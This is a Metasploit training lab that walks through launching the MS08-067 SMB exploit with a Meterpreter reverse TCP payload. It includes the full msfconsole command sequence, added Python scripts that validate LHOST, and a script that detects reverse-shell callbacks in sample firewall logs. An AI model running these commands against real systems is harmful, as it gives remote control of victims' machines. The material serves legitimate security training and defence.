Introduction
In this lab, you will learn the fundamental steps of using a reverse shell payload within the Metasploit Framework. Metasploit is a powerful penetration testing tool that comes with a vast library of exploits, payloads, and auxiliary modules.
A "payload" is the code that runs on the target system after an exploit successfully compromises it. A "reverse shell" is a type of payload where the compromised target machine initiates a connection back to the attacker's machine. This technique is often used to bypass firewalls that might block incoming connections to the target but allow outgoing connections.
We will be using the windows/meterpreter/reverse_tcp payload. Meterpreter is an advanced, feature-rich payload that provides an interactive shell, allowing the attacker to execute commands, upload/download files, and perform many other post-exploitation activities.
By the end of this lab, you will understand the workflow for selecting an exploit, configuring a reverse shell payload, and launching the attack.
Select an exploit module for a target
In this step, we will launch the Metasploit Framework console and select an exploit module. An exploit is a piece of code that takes advantage of a specific vulnerability in a system. For this lab, we will use a well-known exploit for educational purposes.
First, open a terminal from your desktop.
Now, start the Metasploit console. We'll use the -q flag for a "quiet" launch, which suppresses the startup banner.
msfconsole -q
Once Metasploit is loaded, you will see the msf6 > prompt. This is the Metasploit command-line interface.
Our next action is to select an exploit. We will use the use command followed by the name of the exploit module. For this lab, we'll target the MS08-067 vulnerability, a classic and reliable exploit for older Windows systems.
Type the following command into the msf6 > prompt:
use exploit/windows/smb/ms08_067_netapi
After you press Enter, you'll notice that the prompt changes. It now includes the name of the selected exploit, indicating that you are in the context of this module.
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >
You have now successfully selected an exploit module and are ready to configure it.
Set the payload to windows/meterpreter/reverse_tcp
In this step, you will set the payload for the selected exploit. A payload is the code that will be executed on the target machine after the exploit is successful. As mentioned in the introduction, we will use a reverse TCP Meterpreter payload.
Metasploit may have defaulted to this payload when you selected the exploit (as seen in the output from the previous step), but it's good practice to set it explicitly to ensure the correct payload is configured.
In the msf6 exploit(windows/smb/ms08_067_netapi) > prompt, use the set payload command:
set payload windows/meterpreter/reverse_tcp
After running the command, Metasploit will confirm the change.
payload => windows/meterpreter/reverse_tcp
To see all the options you can configure for the selected exploit and payload, you can use the show options command. This is a very useful command to see what parameters are required before launching an attack.
show options
You will see a list of module options, payload options, and exploit targets. Notice the RHOSTS and LHOST options, which we will configure in the next steps.
Set the RHOSTS option for the exploit
In this step, we will configure the RHOSTS option. RHOSTS stands for "Remote Host(s)" and it specifies the IP address of the target machine you want to attack.
For any exploit to work, you must tell Metasploit where to send it. The set command is used to configure these options.
In a real-world scenario, you would have identified a target's IP address through reconnaissance. For this lab, we will use a placeholder IP address.
At the msf6 exploit(...) > prompt, set the RHOSTS to 10.0.2.15.
set RHOSTS 10.0.2.15
Metasploit will confirm that the RHOSTS option has been set.
RHOSTS => 10.0.2.15
You have now told Metasploit which machine to target.
Set the LHOST option to your Kali IP address
In this step, we will set the LHOST option. LHOST stands for "Local Host" and it must be set to the IP address of your machine (the attacker's machine). This is a crucial step for a reverse shell, as it tells the compromised target where to connect back to.
To find your machine's IP address, you'll need to open a new terminal window. Do not close your existing msfconsole terminal. You can open a new terminal from the application menu.
In the new terminal, run the following command to display your network interface information:
ip addr show eth0
You will see output similar to this. Look for the inet address, which is your IP.
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
In the example above, the IP address is 172.17.0.2. Note down your IP address.
Now, switch back to your original terminal with the msfconsole prompt. Use the set command to configure LHOST with the IP address you just found. Replace YOUR_IP_ADDRESS with your actual IP.
set LHOST YOUR_IP_ADDRESS
For example, if your IP was 172.17.0.2, the command would be:
set LHOST 172.17.0.2
Metasploit will confirm the setting:
LHOST => 172.17.0.2
All necessary options are now configured.
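Because a wrong LHOST silently breaks a reverse shell (the target will try to connect back to an address that is not yours, and you will never see a session), it is worth checking the value against the machine's own addresses before running the exploit. The following Python script is an added example, not part of the lab or of Metasploit: it parses `ip addr show` output in the format shown in the previous step (the sample below is the lab's own output, embedded as a string) and classifies a candidate LHOST as one of the machine's global IPv4 addresses, a different address in the same subnet (a likely typo), an address that is not local at all, or not an IP address (for instance the literal YOUR_IP_ADDRESS placeholder). The function names `local_ipv4_addresses` and `check_lhost` are this example's own.

```python
import ipaddress
import re

# Sample `ip addr show eth0` output, copied from the lab text above
# (the real command prints this to the terminal; here it is embedded as a string).
SAMPLE_IP_ADDR = """\
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
"""

# One "inet A.B.C.D/prefix ... scope <scope>" line per IPv4 address on the interface.
INET_RE = re.compile(
    r"^\s*inet (?P<addr>\d+\.\d+\.\d+\.\d+)/(?P<prefix>\d+) .*?scope (?P<scope>\w+)",
    re.MULTILINE,
)


def local_ipv4_addresses(ip_addr_output):
    """Return the global-scope IPv4 interfaces (address + prefix) found in `ip addr` output.

    Loopback and link-local addresses have other scopes ("host", "link") and are skipped,
    since a reverse shell could never reach them from another machine.
    """
    return [
        ipaddress.ip_interface(f"{m['addr']}/{m['prefix']}")
        for m in INET_RE.finditer(ip_addr_output)
        if m["scope"] == "global"
    ]


def check_lhost(lhost, ip_addr_output):
    """Classify a candidate LHOST value against this machine's own addresses.

    Returns one of:
      "invalid"     - not an IP address at all (e.g. a leftover placeholder)
      "ok"          - exactly one of this machine's global IPv4 addresses
      "same-subnet" - inside one of our subnets but not our address (probable typo)
      "not-local"   - an address this machine does not own (e.g. the target's IP)
    """
    try:
        candidate = ipaddress.ip_address(lhost)
    except ValueError:
        return "invalid"
    interfaces = local_ipv4_addresses(ip_addr_output)
    if any(iface.ip == candidate for iface in interfaces):
        return "ok"
    if any(candidate in iface.network for iface in interfaces):
        return "same-subnet"
    return "not-local"


if __name__ == "__main__":
    for value in ("172.17.0.2", "172.17.0.3", "10.0.2.15", "YOUR_IP_ADDRESS"):
        print(f"LHOST {value:16} -> {check_lhost(value, SAMPLE_IP_ADDR)}")
```

On a live system you would feed the script the real output, for example `check_lhost(sys.argv[1], subprocess.run(["ip", "addr", "show"], capture_output=True, text=True).stdout)`; anything other than "ok" means the handler in the next step would be listening on an address the target cannot reach.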
Run the exploit and wait for the target to connect back
In this step, with all options configured, you will launch the exploit.
The exploit command (or its alias, run) tells Metasploit to start the listener for the reverse connection and then send the exploit to the target specified in RHOSTS.
At the msf6 exploit(...) > prompt, type:
exploit
Metasploit will now attempt to run the exploit against the target. You will see output like this:
[*] Started reverse TCP handler on 172.17.0.2:4444
[*] 10.0.2.15:445 - Attempting to trigger the vulnerability...
[-] 10.0.2.15:445 - Exploit failed: Rex::ConnectionRefused The connection was refused by the remote host (10.0.2.15:445).
[*] Exploit completed, but no session was created.
Important: In this lab environment, the exploit will fail because there is no actual vulnerable machine at the placeholder IP address 10.0.2.15. The output "Exploit completed, but no session was created" is expected.
If this were a real, vulnerable target, and the exploit was successful, you would see a message like "Meterpreter session 1 opened" and your prompt would change to meterpreter >, giving you full control over the target.
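The handler output above makes the network pattern of a reverse shell concrete, and that pattern is also what a defender looks for: the attacker first reaches the target on the exploited service port (10.0.2.15:445 here), and moments later the target opens a new outbound connection back to the attacker (172.17.0.2:4444, Metasploit's default handler port). The following Python script is an added example, not part of the lab or of Metasploit, showing how that reversal can be detected in firewall or flow logs. The log format and the log lines themselves are constructed for the example (they mirror the exploit flow above, plus unrelated traffic and one blocked attempt); the function names `parse_log` and `find_callbacks`, the five-minute correlation window and the port watchlists are this example's own choices.

```python
import re
from datetime import datetime, timedelta

# Constructed firewall-style log lines (not real captures). Lines 1-2 mirror the lab's
# exploit flow: attacker 172.17.0.2 reaches 10.0.2.15 on SMB, then 10.0.2.15 connects
# back to 172.17.0.2:4444. The rest is benign traffic and one blocked SMB attempt.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z proto=tcp src=172.17.0.2:51000 dst=10.0.2.15:445 action=allow
2024-05-01T10:00:02Z proto=tcp src=10.0.2.15:49152 dst=172.17.0.2:4444 action=allow
2024-05-01T10:05:00Z proto=tcp src=10.0.2.20:49200 dst=10.0.2.50:443 action=allow
2024-05-01T10:06:00Z proto=tcp src=10.0.2.30:49300 dst=10.0.2.15:445 action=allow
2024-05-01T10:07:00Z proto=tcp src=198.51.100.7:40000 dst=10.0.2.15:445 action=deny
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) proto=(?P<proto>\w+) src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) action=(?P<action>\w+)$"
)

EXPLOITED_SERVICE_PORTS = {445}   # SMB: the port the exploit above is sent to
DEFAULT_HANDLER_PORTS = {4444}    # default reverse_tcp handler port, seen in the output above
CALLBACK_WINDOW = timedelta(minutes=5)  # how soon after the inbound hit a callback counts


def parse_log(text):
    """Parse allowed TCP connections out of the constructed log format; skip the rest."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["action"] != "allow":
            continue  # malformed lines, and blocked connections that never completed
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]),
        })
    return events


def find_callbacks(text):
    """Flag outbound connections that look like a reverse-shell callback.

    Two independent signals, either of which raises an alert:
      1. the destination port is a known default handler port;
      2. the connecting host was itself the *destination* of a connection from the
         same peer to an exploitable service shortly before (the direction reversal
         that defines a reverse shell, regardless of which port the handler uses).
    """
    events = parse_log(text)
    alerts = []
    for i, ev in enumerate(events):
        reasons = []
        if ev["dport"] in DEFAULT_HANDLER_PORTS:
            reasons.append(f"destination port {ev['dport']} is a default handler port")
        for prior in events[:i]:
            if (prior["src"] == ev["dst"] and prior["dst"] == ev["src"]
                    and prior["dport"] in EXPLOITED_SERVICE_PORTS
                    and timedelta(0) <= ev["ts"] - prior["ts"] <= CALLBACK_WINDOW):
                reasons.append(
                    f"{ev['src']} was contacted on port {prior['dport']} by "
                    f"{ev['dst']} {int((ev['ts'] - prior['ts']).total_seconds())}s earlier")
                break
        if reasons:
            alerts.append({"victim": ev["src"], "attacker": ev["dst"],
                           "callback_port": ev["dport"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print(f"ALERT {alert['victim']} -> {alert['attacker']}:{alert['callback_port']}")
        for reason in alert["reasons"]:
            print(f"  - {reason}")
```

The second signal is the more robust one: an attacker can change LPORT away from 4444 with a single set command, but a reverse shell cannot avoid the inbound-then-outbound reversal between the same two hosts. In the failed run shown in the lab there would be no callback line at all (the connection to 10.0.2.15:445 was refused), so nothing would be flagged, which is also the correct answer.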
This completes the process of configuring and launching an exploit with a reverse shell payload. To exit Metasploit, type exit.
exit
Summary
In this lab, you have learned the fundamental workflow for using a reverse shell payload in the Metasploit Framework.
You practiced the following key steps:
- Starting the Metasploit console (msfconsole).
- Selecting an exploit module with the use command.
- Setting a payload with the set payload command.
- Configuring the necessary options, specifically RHOSTS (the target) and LHOST (your listener IP).
- Launching the attack with the exploit command.
You also learned the critical difference between RHOSTS and LHOST and why setting LHOST correctly is essential for a reverse shell to succeed. Although the exploit did not result in a session in this simulated environment, you have successfully executed all the commands required for a real-world attack. Congratulations on completing the lab!